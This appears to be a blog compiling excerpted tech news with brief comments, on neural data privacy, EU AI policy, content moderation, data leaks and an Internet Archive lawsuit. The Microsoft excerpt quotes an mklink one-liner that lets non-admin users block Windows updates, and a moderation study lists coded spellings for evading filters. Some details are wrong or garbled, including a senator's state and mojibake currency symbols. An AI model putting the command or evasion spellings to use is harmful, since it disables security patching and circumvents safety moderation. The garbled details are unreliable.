Neurotech companies are selling your brain data, senators warn

Three Democratic senators are sounding the alarm over brain-computer interface (BCI) technologies’ ability to collect — and potentially sell — our neural data. In a letter to the Federal Trade Commission (FTC), Sens. Chuck Schumer (D-NY), Maria Cantwell (D-IN), and Ed Markey (D-MA) called for an investigation into neurotechnology companies’ handling of user data, and for tighter regulations on their data-sharing policies.

“Unlike other personal data, neural data — captured directly from the human brain — can reveal mental health conditions, emotional states, and cognitive patterns, even when anonymized,” the letter reads. “This information is not only deeply personal; it is also strategically sensitive.”

While the concept of neural technologies may conjure up images of brain implants like Elon Musk’s Neuralink, there are far less invasive — and less regulated — neurotech products on the market, including headsets that help people meditate, purportedly trigger lucid dreaming, and promise to help users with online dating by helping them swipe through apps “based on your instinctive reaction.” These consumer products gobble up insights about users’ neurological data — and since they aren’t categorized as medical devices, the companies behind them aren’t barred from sharing that data with third parties.

“Neural data is the most private, personal, and powerful information we have—and no company should be allowed to harvest it without transparency, ironclad consent, and strict guardrails. Yet companies are collecting it with vague policies and zero transparency,” Schumer told The Verge via email.

The letter cites a 2024 report by the Neurorights Foundation, which found that most neurotech companies not only have few safeguards on user data but also have the ability to share sensitive information with third parties. The report looked at the data policies of 30 consumer-facing BCI companies and found that all but one “appear to have access to” users’ neural data, “and provide no meaningful limitations to this access.” The Neurorights Foundation only surveyed companies whose products are available to consumers without the help of a medical professional; implants like those made by Neuralink weren’t among them.

The companies surveyed by the Neurorights Foundation make it difficult for users to opt out of having their neurological data shared with third parties. Just over half the companies mentioned in the report explicitly let consumers revoke consent for data processing, and only 14 of the 30 give users the ability to delete their data. In some instances, user rights aren’t universal — for example, some companies only let users in the European Union delete their data but don’t grant the same rights to users elsewhere in the world.

To safeguard against potential abuses, the senators are calling on the FTC to:

  • investigate whether neurotech companies are engaging in unfair or deceptive practices that violate the FTC Act
  • compel companies to report on data handling, commercial practices, and third-party access
  • clarify how existing privacy standards apply to neural data
  • enforce the Children’s Online Privacy Protection Act as it relates to BCIs
  • begin a rulemaking process to establish safeguards for neural data, and setting limits on secondary uses like AI training and behavioral profiling
  • and ensure that both invasive and noninvasive neurotechnologies are subject to baseline disclosure and transparency standards, even when the data is anonymized

Though the senators’ letter calls out Neuralink by name, Musk’s brain implant tech is already subject to more regulations than other BCI technologies. Since Neuralink’s brain implant is considered a “medical” technology, it’s required to comply with the Health Insurance Portability and Accountability Act (HIPAA), which safeguards people’s medical data.

Stephen Damianos, the executive director of the Neurorights Foundation, said that HIPAA may not have entirely caught up to existing neurotechnologies, especially with regards to “informed consent” requirements.

“There are long-established and validated models for consent from the medical world, but I think there’s work to be done around understanding the extent to which informed consent is sufficient when it comes to neurotechnology,” Damianos told The Verge. “The analogy I like to give is, if you were going through my apartment, I would know what you would and wouldn’t find in my apartment, because I have a sense of what exactly is in there. But brain scans are overbroad, meaning they collect more data than what is required for the purpose of operating a device. It’s extremely hard — if not impossible — to communicate to a consumer or a patient exactly what can today and in the future be decoded from their neural data.”

Data collection becomes even trickier for “wellness” neurotechnology products, which don’t have to comply with HIPAA, even when they advertise themselves as helping with mental health conditions like depression and anxiety.

Damianos said there’s a “very hazy gray area” between medical devices and wellness devices.

“There’s this increasingly growing class of devices that are marketed for health and wellness as distinct from medical applications, but there can be a lot of overlap between those applications,” Damianos said. The dividing line is often whether a medical intermediary is required to help someone obtain a product, or whether they can “just go online, put in your credit card, and have it show up in a box a few days later.”

There are very few regulations on neurotechnologies advertised as being for “wellness.” In April 2024, Colorado passed the first-ever legislation protecting consumers’ neural data. The state updated its existing Consumer Protection Act, which protects users’ “sensitive data.” Under the updated legislation, “sensitive data” now includes “biological data” like biological, genetic, biochemical, physiological, and neural information. And in September, California amended its Consumer Privacy Act to protect neural data.

“We believe in the transformative potential of these technologies, and I think sometimes there’s a lot of doom and gloom about them,” Damianos told The Verge. “We want to get this moment right. We think it’s a really profound moment that has the potential to reshape what it means to be human. Enormous risks come from that, but we also believe in leveraging the potential to improve people’s lives.”

Source: Neurotech companies are selling your brain data, senators warn | The Verge

AI Helps Unravel a Cause of Alzheimer’s Disease and Identify a Therapeutic Candidate

graphic showing how Alzheimer's severity increases with PHGDH expression

A new study found that a gene recently recognized as a biomarker for Alzheimer’s disease is actually a cause of it, due to its previously unknown secondary function. Researchers at the University of California San Diego used artificial intelligence to help both unravel this mystery of Alzheimer’s disease and discover a potential treatment that obstructs the gene’s moonlighting role.

[…]

hong and his team took a closer look at phosphoglycerate dehydrogenase (PHGDH), which they had previously discovered as a potential blood biomarker for early detection of Alzheimer’s disease. In a follow-up study, they later found that expression levels of the PHGDH gene directly correlated with changes in the brain in Alzheimer’s disease; in other words, the higher the levels of protein and RNA produced by the PHGDH gene, the more advanced the disease.

[…]

Using mice and human brain organoids, the researchers found that altering the amounts of PHGDH expression had consequential effects on Alzheimer’s disease: lower levels corresponded to less disease progression, whereas increasing the levels led to more disease advancement. Thus, the researchers established that PHGDH is indeed a causal gene to spontaneous Alzheimer’s disease.

In further support of that finding, the researchers determined—with the help of AI—that PHGDH plays a previously undiscovered role: it triggers a pathway that disrupts how cells in the brain turn genes on and off. And such a disturbance can cause issues, like the development of Alzheimer’s disease.

[…]

another Alzheimer’s project in his lab, which did not focus on PHGDH, changed all this. A year ago, that project revealed a hallmark of Alzheimer’s disease: a widespread imbalance in the brain in the process where cells control which genes are turned on and off to carry out their specific roles.

The researchers were curious if PHGDH had an unknown regulatory role in that process, and they turned to modern AI for help.

With AI, they could visualize the three-dimensional structure of the PHGDH protein. Within that structure, they discovered that the protein has a substructure that is very similar to a known DNA-binding domain in a class of known transcription factors. The similarity is solely in the structure and not in the protein sequence.>

Zhong said, “It really demanded modern AI to formulate the three-dimensional structure very precisely to make this discovery.”

After discovering the substructure, the team then demonstrated that with it, the protein can activate two critical target genes. That throws off the delicate balance, leading to several problems and eventually the early stages of Alzheimer’s disease. In other words, PHGDH has a previously unknown role, independent of its enzymatic function, that through a novel pathway leads to spontaneous Alzheimer’s disease.

That ties back to the team’s earlier studies: the PHGDH gene produced more proteins in the brains of Alzheimer’s patients compared to the control brains, and those increased amounts of the protein in the brain triggered the imbalance. While everyone has the PHGDH gene, the difference comes down to the expression level of the gene, or how many proteins are made by it.

[…]

Given that PHGDH is such an important enzyme, there are past studies on its possible inhibitors. One small molecule, known as NCT-503, stood out to the researchers because it is not quite effective at impeding PHGDH’s enzymatic activity (the production of serine), which they did not want to change. NCT-503 is also able to penetrate the blood-brain-barrier, which is a desirable characteristic.

They turned to AI again for three-dimensional visualization and modeling. They found that NCT-503 can access that DNA-binding substructure of PHGDH, thanks to a binding pocket. With more testing, they saw that NCT-503 does indeed inhibit PHGDH’s regulatory role.

When the researchers tested NCT-503 in two mouse models of Alzheimer’s disease, they saw that it significantly alleviated Alzheimer’s progression. The treated mice demonstrated substantial improvement in their memory and anxiety tests. These tests were chosen because Alzheimer’s patients suffer from cognitive decline and increased anxiety.

The researchers do acknowledge limitations of their study. One being that there is no perfect animal model for spontaneous Alzheimer’s disease. They could test NCT-503 only in the mouse models that are available, which are those with mutations in those known disease-causing genes.

Still, the results are promising, according to Zhong.

[…]

Source: AI Helps Unravel a Cause of Alzheimer’s Disease and Identify a Therapeutic Candidate

Can the EU’s Dual Strategy of Regulation and Investment Redefine AI Leadership?

Beyond sharing a pair of vowels, AI and the EU both present significant challenges when it comes to setting the right course. This article makes the case that reducing regulation for large general-purpose AI providers under the EU’s competitiveness agenda is not a silver bullet for catching Europe up to the US and China, and would only serve to entrench European dependencies on US tech. Instead, by combining its regulatory toolkit and ambitious investment strategy, the EU is uniquely positioned to set the global standard for trustworthy AI and pursue its tech sovereignty. It is an opportunity that Europe must take.

Recent advances in AI have drastically shortened the improvement cycle from years to months, thanks to new inference-time compute techniques that enable self-prompting, chain-of-thought reasoning in models like OpenAI’s o1 and DeepSeek’s R1. However, these rapid gains also increase risks like AI-enabled cyber offenses and biological attacks. Meanwhile, the EU and France recently committed €317 billion to AI development in Europe, joining a global race with comparably large announcements from both the US and China.

Now turning to EU AI policy, the newly established AI Office and 13 independent experts are nearing the end of a nine-month multistakeholder drafting process of the Code of Practice (CoP); the voluntary technical details of the AI Act’s mandatory provisions for general purpose AI providers. The vast majority of the rules will apply to only the largest model providers, ensuring proportionality: the protection of SMEs, start-ups, and other downstream industries. In the meantime, the EU has fully launched a competitiveness agenda, with the Commission’s recently published Competitiveness Compass and first omnibus simplification package outlining plans for widespread streamlining of reporting obligations amidst mounting pushback against this simplified narrative. Add to this the recent withdrawal of the AI Liability Directive, and it’s clear to see which way the political winds are blowing.

So why must this push for simplification be replaced by a push for trustworthy market creation in the case of general-purpose AI and the Code of Practice? I’ll make three main points: 1) Regulation is not the reason for Europe lacking Big Tech companies, 2) Sweeping deregulation creates legal uncertainty and liability risks for downstream deployers, and slows trusted adoption of new technologies and thereby growth, 3) Watering down the CoP for upstream model providers with systemic risk will almost exclusively benefit large US incumbents, entrenching dependency and preventing tech sovereignty.

[…]

The EU’s tech ecosystem had ample time to emerge in the years preceding and following the turn of the century, free of so-called “red tape,” but this did not happen and will not again through deregulation […] One reason presented by Bradford is that the European digital single market still remains fragmented, with differing languages, cultures, consumer preferences, administrative obstacles, and tax regimes preventing large tech companies from seamlessly growing within the bloc and throughout the world. Even more fragmented are the capital markets of the EU, resulting in poor access to venture capital for tech start-ups and scale-ups. Additional points include harsh, national-level bankruptcy laws that are “creditor-oriented” in the EU, compared to more forgiving “debtor-friendly” equivalents in the US, resulting in lower risk appetite for European entrepreneurs. Finally, skilled migration is significantly more streamlined in the US, with federal-level initiatives like the H-1B visa leading to the majority of Big Tech CEOs hailing from overseas

[…]

The downplaying of regulation as Europe’s AI hindrance has been repeated by leading industry voices such as US VC firm a16z, European VC firm Merantix Capital, and French provider MistralAI. To reiterate: the EU ‘lagging behind’ on trillion-dollar tech companies and the accompanying innovation was not a result of regulation before there was regulation, and is also not a result of regulation after.

[…]

Whether for planes, cars, or drugs, early use of dangerous new technologies, without accompanying rules, saw frequent preventable accidents, reducing consumer trust and slowing market growth. Now, with robust checks and balances in place from well-resourced regulatory authorities, such markets have been able to thrive, providing value and innovation to citizens. Other sectors, like nuclear energy and, more recently, crypto, have suffered from an initial lack of regulation, causing industry corner-cutting, leading to infamous disasters (from Fukushima to the collapse of FTX) from which public trust has been difficult to win back. Regulators around the world are currently risking the same fate for AI.

This point is particularly relevant for so-called ‘downstream deployers’: companies that build applications on top of (usually) Big Tech, provided underlying models. Touted by European VC leader Robert Lacher as Europe’s “huge opportunity” in AI, downstream deployers, particularly SMEs, serve to gain from the Code of Practice, which ensures that necessary regulatory checks and balances occur upstream at the level of model provider.

[…]

Finally, the EU’s enduring and now potentially crippling dependency on US technology companies has been importantly addressed by the new Commission, best exemplified by the title of Executive Vice President Henna Virkkunen’s file: Tech Sovereignty, Security and Democracy. With the last few months’ geopolitical developments, including all-time-low transatlantic relations and an unfolding trade war, some have gone as far as warning of the possibility of US technology being used for surveillance of Europe and of the US sharing intelligence with Russia. Clearly, the urgency of tech sovereignty has drastically increased. A strong Code of Practice would return agency to the EU, ensuring that US upstream incumbents meet basic security, safety, and ethical standards whilst also easing the EU’s AI adoption problem by ensuring technology is truly trustworthy.

So, concretely, what needs to be done? Bruegel economist Mario Mariniello summed it up concisely: “On tech regulation, the European Union should be bolder.”

[…]

This article has outlined why deregulating highly capable AI models, produced by the world’s largest companies, is not a solution to Europe’s growth problem. Instead of stripping back obligations, ensuring protections of European citizens, the EU must combine its ambitious AI investment plan with boldly pursuing leadership in setting global standards, accelerating trustworthy adoption and ensuring tech sovereignty. This combination will put Europe on the right path to drive this technological revolution forward for the benefit of all.

Source: Can the EU’s Dual Strategy of Regulation and Investment Redefine AI Leadership? | TechPolicy.Press

Europe’s Tech Sovereignty Demands More Than Competitiveness

BRUSSELS – As part of his confrontational stance toward Europe, US President Donald Trump could end up weaponizing critical technologies. The European Union must appreciate the true nature of this threat instead of focusing on competing with the US as an economic ally. To achieve true tech sovereignty, the EU should transcend its narrow focus on competitiveness and deregulation and adopt a far more ambitious strategy

[…]

Europe’s growing anxiety about competitiveness is fueled by its inability to challenge US-based tech giants where it counts: in the market. As the Draghi report points out, the productivity gap between the United States and the EU largely reflects the relative weakness of Europe’s tech sector. Recent remarks by European Commission President Ursula von der Leyen and Tech Commissioner Henna Virkkunen suggest that policymakers have taken Draghi’s message to heart, making competitiveness the central focus of EU tech policy. But this singular focus is both insufficient and potentially counterproductive at a time of technological and geopolitical upheaval. While pursuing competitiveness could reduce Big Tech’s influence over Europe’s economy and democratic institutions, it could just as easily entrench it. European leaders’ current fixation on deregulationturbocharged by the Draghi report – leaves EU policymaking increasingly vulnerable to lobbying by powerful corporate interests and risks legitimizing policies that are incompatible with fundamental European values.

As a result, the European Commission’s deregulatory measures – including its recent decision to shelve draft AI and privacy rules, and its forthcoming “simplification” of tech legislation including the GDPR – are more likely to benefit entrenched tech giants than they are to support startups and small and medium-size enterprises. Meanwhile, Europe’s hasty and uncritical push for “AI competitiveness” risks reinforcing Big Tech’s tightening grip on the AI technology stack.

It should come as no surprise that the Draghi report’s deregulatory agenda was warmly received in Silicon Valley, even by Elon Musk himself. But the ambitions of some tech leaders go far beyond cutting red tape. Musk’s use of X (formerly Twitter) and Starlink to interfere in national elections and the war in Ukraine, together with the Trump administration’s brazen attacks on EU tech regulation, show that Big Tech’s quest for power poses a serious threat to European sovereignty.

Europe’s most urgent task, then, is to defend its citizens’ rights, sovereignty, and core values from increasingly hostile American tech giants and their allies in Washington. The continent’s deep dependence on US-controlled digital infrastructure – from semiconductors and cloud computing to undersea cables – not only undermines its competitiveness by shutting out homegrown alternatives but also enables the owners of that infrastructure to exploit it for profit.

[…]

Strong enforcement of competition law and the Digital Markets Act, for example, could curb Big Tech’s influence while creating space for European startups and challengers to thrive. Similarly, implementing the Digital Services Act and the AI Act will protect citizens from harmful content and dangerous AI systems, empowering Europe to offer a genuine alternative to Silicon Valley’s surveillance-driven business models. Against this backdrop, efforts to develop homegrown European alternatives to Big Tech’s digital infrastructure have been gaining momentum. A notable example is the so-called “Eurostack” initiative, which should be viewed as a key step in defending Europe’s ability to act independently.

[…]

A “competitive” economy holds little value if it comes at the expense of security, a fair and safe digital environment, civil liberties, and democratic values. Fortunately, Europe doesn’t have to choose. By tackling its technological dependencies, protecting democratic governance, and upholding fundamental rights, it can foster the kind of competitiveness it truly needs.

Source: Europe’s Tech Sovereignty Demands More Than Competitiveness by Marietje Schaake & Max von Thun – Project Syndicate

Deregulation has led to huge amounts of problems globally, such as the monopoly / duopoly problems we can’t seem to deal with; reliance on external markets and companies that whimsically change their minds; unsustainable hardware and software choices allowing devices to be bricked, poorly secured and irreparable; vendor lock-in to closed source ecosystems; damage to innovation; privacy invasions which lead to hacking attacks; etc etc. As Europe we can make our own choices about our own values – we are not determined by the singular motive of profit. European values are inclusive and also promote things like education and happiness.

Content Moderation or Security Theater? How Social Media Platforms Really Enforce Community Guidelines

[…] To better understand how major platforms moderate content, we studied and compared the community guidelines of Meta, TikTok, YouTube, and X.

We must note that platforms’ guidelines often evolve, so the information used in this study is based only on the latest available data at the time of publication. Moreover, the strictness and regularity of policy implementation may vary per platform.

Content Moderation

We were able to categorize 3 main methods of content moderation in major platforms’ official policies: AI-based enforcement, human or staff review, and user reporting.

Content moderation practices (AI enforcement, human review, and user reporting) across Meta, TikTok, YouTube, and X

Notably, TikTok is the only platform that doesn’t officially employ all 3 content moderation methods. It only clearly defines the process of user reporting, although it mentions that it relies on a “combination of safety approaches.” Content may go through an automated review, especially those from accounts with previous violations, and human moderation when necessary.

Human or staff review and AI enforcement are observed in the other 3 platforms’ policies. In most cases, the platforms claim to employ the methods hand-in-hand. YouTube and X (formerly Twitter) describe using a combination of machine learning and human reviewers. Meta has a unique Oversight Board that manages more complicated cases.

Criteria for

Banning Accounts

Meta TikTok YouTube X
Severe Single Violation
Repeated Violations
Circumventing Enforcement

All platform policies include the implementation of account bans for repeat or single “severe” violations. Of the 4 platforms, TikTok and X are the only ones to include circumventing moderation enforcement as additional grounds for account banning.

Content Restrictions

Age Restrictions Adult Content Gore Graphic Violence
Meta 10-12 (supervised), 13+ Allowed with conditions Allowed with conditions Allowed with conditions
TikTok 13+ Prohibited Allowed with conditions Prohibited
YouTube Varies Prohibited Prohibited Prohibited
X 18+ Allowed (with labels) Allowed with conditions Prohibited

Content depicting graphic violence is the most widely prohibited in platforms’ policies, with only Meta allowing it with conditions (the content must be “newsworthy” or “professional”).

Adult content is also heavily moderated per the official community guidelines. X allows them given there are adequate labels, while other platforms restrict any content with nudity or sexual activity that isn’t for educational purposes.

YouTube is the only one to impose a blanket prohibition on gory or distressing materials. The other platforms allow such content but might add warnings for users.

Policy strictness across platforms, ranked from least (1) to most (5) strict across 6 categories

All platforms have a zero-tolerance policy for content relating to child exploitation. Other types of potentially unlawful content — or those that threaten people’s lives or safety — are also restricted with varying levels of strictness. Meta allows discussions of crime for awareness or news but prohibits advocating for or coordinating harm.

Other official metrics for restriction include the following:

Platforms' official community guidelines regarding free speech vs. fact-checking, news and education, and privacy and security

What Gets Censored the Most?

Overall, major platforms’ community and safety guidelines are generally strict and clear regarding what’s allowed or not. However, what content moderation looks like in practice may be very different.

We looked at censorship patterns for videos on major social media platforms, including Instagram Reels, TikTok, Facebook Reels, YouTube Shorts, and X.

The dataset considered a wide variety of videos, ranging from entertainment and comedy to news, opinion, and true crime. Across the board, the types of content we observed to be most commonly censored include:

  • Profanity: Curse words were censored via audio muting, bleeping, or subtitle redaction.
  • Explicit terms: Words pertaining to sexual activity or self-harm were omitted or replaced with alternative spellings.
  • Violence and conflict: References to weapons, genocide, geopolitical conflicts, or historical violence resulted in muted audio, altered captions, or warning notices, especially on TikTok and Instagram.
  • Sexual abuse: Content related to human trafficking and sexual abuse had significant censorship, often requiring users to alter spellings (e.g., “s3x abuse” or “trffcked”).
  • Racial slurs: Some instances of censored racial slurs were found in rap music videos on TikTok and X.

Pie charts showing the types of content censored and censorship methods observed across platforms

Instagram seems to heavily censor explicit language, weapons, and sexual content, mostly through muting and subtitle redaction. Content depicting war, conflict, graphic deaths and injuries, or other potentially distressing materials often require users to click through a “graphic content” warning before being able to view the image or video.

Facebook primarily censors profanity and explicit terms through audio bleeping and subtitle removal. However, some news-related posts are able to retain full details.

On the other hand, TikTok uses audio censorship and alters captions. As such, many creators regularly use coded language when discussing sensitive topics. YouTube also employs similar filters, muting audio or blurring visuals extensively to hide profanity and explicit words or graphics. However, it still allows offensive words in some contexts (educational, scientific, etc.).

X combines a mix of redactions, visual blurring, and muted audio. Profanity and graphic violence are sometimes left uncensored, but sensitive content will typically get flagged or blurred, especially once reported by users.

Censorship Method Platforms Using It Description/Example
Muted or Bleeped Audio Instagram, TikTok, Facebook, YouTube, X Profanity, explicit terms, and violence-related speech altered or omitted
Redacted or Censored Subtitles Instagram, TikTok, Facebook, X Sensitive words (e.g., words like “n*****,” “fu*k,” and “traff*cked”) altered or omitted
Blurred Video or Images Instagram, Facebook, X Sensitive content (e.g., death and graphic injuries) blurred and labeled with a warning

News and Information Accounts

Our study confirmed that news outlets and credible informational accounts are sometimes subject to different moderation standards.

Posts on Instagram, YouTube, and X (from accounts like CNN or BBC) discussing war or political violence were only blurred and presented with an initial viewing warning, but they were not muted or altered in any way. Meanwhile, user-generated content discussing similar topics faced audio censorship.

On the other hand, comedic and entertainment posts still experienced strict regulations on profanity, even on news outlets. This suggests that humor and artistic contexts likely don’t exempt content from moderation, regardless of the type of account or creator.

The Coded Language Workaround

A widespread workaround for censorship is the use of coded language to bypass automatic moderation. Below are some of the most common ones we observed:

  • “Fuck” → “fk,” “f@ck,” “fkin,” or a string of 4 special characters
  • “Ass” → “a$$,” “a**,” or “ahh”
  • “Gun” → “pew pew” or a hand gesture in lieu of saying the word
  • “Genocide” → “g*nocide”
  • “Sex” → “s3x,” “seggs,” or “s3ggs”
  • “Trafficking” → “tr@fficking,” or “trffcked”
  • “Kill” → “k-word”
  • “Dead” → “unalive”
  • “Suicide” → “s-word,” or “s**cide”
  • “Porn” → “p0rn,” “corn,” or corn emoji
  • “Lesbian” → “le$bian” or “le dollar bean”
  • “Rape” → “r@pe,” “grape,” or grape emoji

This is the paradox of modern content moderation: how effective are “strict” guidelines when certain types of accounts are occasionally exempt from them and other users can exploit simple loopholes?

Since coded words are widely and easily understood, it suggests that AI-based censorship mainly filters out direct violations rather than stopping or removing sensitive discussions altogether.

Is Social Media Moderation Just Security Theater?

Overall, it’s clear that platform censorship for content moderation is enforced inconsistently.

Given that our researchers are also subject to the algorithmic biases of the platforms tested, and we’re unlikely to be able to interact with shadowbanned accounts, we can’t fully quantify or qualify the extent of restrictions that some users suffer for potentially showing inappropriate content.

However, we know that many creators are able to circumvent or avoid automated moderation. Certain types of accounts receive preferential treatment in terms of restrictions. Moreover, with social media apps’ heavy reliance on AI moderation, users are able to evade restrictions with the slightest modifications or substitutions.

Are Platforms Capable of Implementing Strict Blanket Restrictions on “Inappropriate” Content?

Especially with how most people rely on social media to engage with the world, it could be considered impractical or even ineffective to try and restrict sensitive conversations. This is particularly true when contexts are excluded, and restrictions focus solely on keywords, which is often the case for automated moderation.

Also, one might ponder whether content restrictions are primarily in place for liability protection instead of user safety — especially if platforms know about the limitations of AI-based moderation but continue to use it as their primary means of enforcing community guidelines.

Are Social Media Platforms Deliberately Performing Selective Moderation?

At the beginning of 2025, Meta made waves after it announced that it would be removing fact-checkers. Many suggested that this change was influenced by the seemingly new goodwill between its founder and CEO, Mark Zuckerberg, and United States President Donald Trump.

Double standards are also apparent in other platforms whose owners have clear political ties. Elon Musk, a popular supporter and backer of Trump, has been reported to spread misinformation about government spending — posting or reposting false claims on X, the platform he owns.

This is despite the platform’s guidelines clearly prohibiting “media that may result in widespread confusion on public issues, impact public safety, or cause serious harm.”

Given the seemingly one-sided implementation of policies on different social media sites, we believe individuals and organizations must practice careful scrutiny when consuming media or information on these platforms.

Community guidelines aren’t fail-safes for ensuring safe, uplifting, and constructive spaces online. We believe that what AI algorithms or fact-checkers consider safe shouldn’t be seen as the standard or universal truth. That is, not all restricted posts are automatically “harmful,” the same way not all retained posts are automatically true or reliable.

Ultimately, the goal of this study is to help digital marketers, social media professionals, journalists, and the general public learn more about the evolving mechanics of online expression. With the insights gathered from this research, we hope to spark conversation about the effectiveness and fairness of content moderation in the digital space.

[…]

Source: Content Moderation or Security Theater? How Social Media Platforms Really Enforce Community Guidelines

1 Million customers from French Boulanger’s Customers Exposed Online for free

In a recent discovery, SafetyDetectives’ Cybersecurity Team stumbled upon a clear web forum post where a threat actor publicized a database allegedly belonging to Boulanger Electroménager & Multimédia purportedly exposing 5 Million of their customers.

What is Boulanger Electroménager & Multimédia?

Boulanger Electroménager & Multimédia is a French company that specializes in the sale of household appliances and multimedia products.

Founded in 1954, according to their website, Boulanger has physical stores and delivers its products to clients across France. The company also offers an app, which has over 1 million downloads on the Google Play Store and Apple’s App Store.

Where Was The Data Found?

The data was found in a forum post available on the clear surface web. This well-known forum operates message boards dedicated to database downloads, leaks, cracks, and more.

What Was Leaked?

The author of the post included two links to the unparsed and clean datasets, which purportedly belong to Boulanger. They claim the unparsed dataset consists of a 16GB .JSON file with 27,561,591 million records, whereas the clean dataset is comprised of a 500MB .CSV file with 5 million records.

Links to both datasets were hidden and set to be shown after giving a like or leaving a comment on the post. As a result, the data was set to be unlocked for free by anyone with an account on the forum who was willing to simply interact with the post.

Our Cybersecurity Team reviewed part of the datasets to assess their authenticity, and we can confirm that the data appears to be legitimate. After running a comparative analysis, it seems like these datasets correspond to the purportedly stolen data from the 2024 cyberincident.

Back in September 2024, Boulanger was one of the targets of a ransomware attack that also affected other retailers, such as Truffaut and Cultura. A threat author with the nickname “horrormar44” claimed responsibility for the breach.

At the time, the data was offered on a different well-known clear web forum — which is currently offline — at a price of €2,000. Although there allegedly were some potential buyers, it is unclear if the sale was actually finalized. In any case, it seems the data has resurfaced now as free to download.

While reviewing the data, we found that the clean dataset contains just over 1 million rows containing one customer per row and includes some duplicates. While that’s still a considerable number of customers, it’s far smaller than the 5 million claimed by the author of the post.

The sensitive information allegedly belonging to Boulanger’s customers included:

  • Name
  • Surname
  • Full physical address
  • Email address
  • Phone number

[….]

Source: 27 Million Records from French Boulanger’s Customers Allegedly Exposed Online

Google turns early Nest Thermostats into dumb thermostats

Google has just announced that it’s ending software updates for the first-generation Nest Learning Thermostat, released in 2011, and the second-gen model that came a year later. This decision also affects the European Nest Learning Thermostat from 2014. “You will no longer be able to control them remotely from your phone or with
Google Assistant, but can still adjust the temperature and modify schedules directly on the thermostat,“ the company wrote in a Friday blog post.

[…]

Google is flatly stating that it has no plans to release additional Nest thermostats in Europe. “Heating systems in Europe are unique and have a variety of hardware and software requirements that make it challenging to build for the diverse set of homes,“ the company said. “The Nest Learning Thermostat (3rd gen, 2015) and Nest Thermostat E (2018) will continue to be sold in Europe while current supplies last.”

[…]

Source: Google is killing software support for early Nest Thermostats | The Verge

Yes, so in about a year they will be dumb thermostats too. I don’t think I would buy one of those then.

Microsoft mystery folder fix needs a fix of its own with simple POC

Turns out Microsoft’s latest patch job might need a patch of its own, again. This time, the culprit is a mysterious inetpub folder quietly deployed by Redmond, now hijacked by a security researcher to break Windows updates.

The folder, typically c:\inetpub, reappeared on Windows systems in April as part of Microsoft’s mitigation for CVE-2025-21204, an exploitable elevation-of-privileges flaw within Windows Process Activation. Rather than patching code directly, Redmond simply pre-created the folder to block a symlink attack path. For many administrators, the reappearance of this old IIS haunt raised eyebrows, especially since the mitigation did little beyond ensuring the folder existed.

For at least one security researcher, in this case Kevin Beaumont, the fix also presented an opportunity to hunt for more vulnerabilities. After poking around, he discovered that the workaround introduced a new flaw of its own, triggered using the mklink command with the /j parameter.

It’s a simple enough function. According to Microsoft’s documentation, mklink “creates a directory or file symbolic or hard link.” And with the /j flag, it creates a directory junction – a type of filesystem redirect.

Beaumont demonstrated this by running: “mklink /j c:\inetpub c:\windows\system32\notepad.exe.” This turned the c:\inetpub folder – precreated in Microsoft’s April 2025 update to block symlink abuse – into a redirect to a system executable. When Windows Update tried to interact with the folder, it hit the wrong target, errored out, and rolled everything back.

“So you just go without security updates,” he noted.

The kicker? No admin rights are required. On many default-configured systems, even standard users can run the same command, effectively blocking Windows updates without ever escalating privileges.

[…]

Source: Microsoft mystery folder fix might need a fix of its own • The Register

Employee monitoring app exposes 21M work screens​ to internet

A surveillance tool meant to keep tabs on employees is leaking millions of real-time screenshots onto the open web.

Your boss watching your screen isn’t the end of the story. Everyone else might be watching, too. Researchers at Cybernews have uncovered a major privacy breach involving WorkComposer, a workplace surveillance app used by over 200,000 people across countless companies.

The app, designed to track productivity by logging activity and snapping regular screenshots of employees’ screens, left over 21 million images exposed in an unsecured Amazon S3 bucket, broadcasting how workers go about their day frame by frame.

[…]

WorkComposer is one of many time-tracking tools that have crept into modern work culture. Marketed as a way to keep teams “accountable,” the software logs keystrokes, tracks how long you spend on each app, and snaps desktop screenshots every few minutes.

The leak shows just how dangerous this setup becomes when basic security hygiene is ignored. A leak of this magnitude turns everyday work activity into a goldmine for cybercriminals.

[…]

The leak’s real-time nature only amplifies the danger, as threat actors could monitor unfolding business operations as they happen, giving them access to otherwise locked-down environments.

[…]

Source: Employee monitoring app exposes 21M work screens​ | Cybernews

Can you imagine the time lost by employers going over all this data?

Microsoft Windows new built in spying tool Microsoft Recall is a really great idea too. Not.

Internet Archive Sued for $700m by Record Labels about digitising songs pre 1960. Petition to rescue the Internet Archive

A dramatic appeal hopes to ensure the survival of the nonprofit Internet Archive. The signatories of a petition, which is now open for further signatures, are demanding that the US recording industry association RIAA and participating labels such as as Universal Music Group (UMG), Capitol Records, Sony Music, and Arista drop their lawsuit against the online library. The legal dispute, pending since mid-2023 and expanded in March, centers on the “Great 78” project. This project aims to save 500,000 song recordings by digitizing 250,000 records from the period 1880 to 1960. Various institutions and collectors have donated the records, which are made for 78 revolutions per minute (“shellac”), so that the Internet Archive can put this cultural treasure online.

The music companies originally demanded Ã…372 million for the online publication of the songs and the associated “mass theft .” They recently increased their demand to Ã…700 million for potential copyright infringement. The basis for the lawsuit is the Music Modernization Act, which US President Donald Trump approved in 2018. This includes the CLASSICS Act. This law retroactively introduces federal copyright protection for sound recordings made before 1972, which until the were protected in the US by different state laws. The monopoly rights now apply US-wide for a good 100 years (for recordings made before 1946) or until 2067 (for recordings made between 1947 and 1972).

The lawsuit ultimately threatens the existence of the entire Internet Archive , including the wavy-known Wayback Machine , they say. This important public service is used by millions of people every day to access historical “snapshots” from the web. Journalists, educators, researchers, lawyers, and citizens use it to verify sources, investigate disinformation, and maintain public accountability. The legal attack also puts a “critical infrastructure of the internet” at risk. And this at a time when digital information is being deleted, overwritten, and destroyed: “We cannot afford to lose the tools that preserve memory and defend facts.” The Internet Archive was forced to delete 500,000 books as recently as 2024. It also continually struggles with IT attacks .

The case is called Universal Music Group et al. v. Internet Archive. The lawsuit was originally filed in the U.S. District Court for the Southern District of New York (Case No. 1:23-cv-07133), but is now pending in the U.S. District Court for the Northern District of California (Case No. 3:23-cv-6522). The Internet Archive takes the position that the Great 78 project does not harm the music industry. Quite the opposite: Anyone who wants to enjoy music uses commercial streaming services anyway; the old 78 rpm shellac recordings are study material for researchers.

Source: Suit of record labels: Petition to rescue the Internet Archive | heise online (NB this is a Google Translate page from the original German page)

Original page here: https://www.heise.de/news/Klage-von-Plattenlabels-Petition-zur-Rettung-des-Internet-Archive-10358777.html

How can copyright law be so incredibly wrong all the time?!

Australian Radio station uses AI host for 6 months before anyone notices

I got an interesting tipoff the other day that Sydney radio station CADA is using an AI avatar instead of an actual radio host.

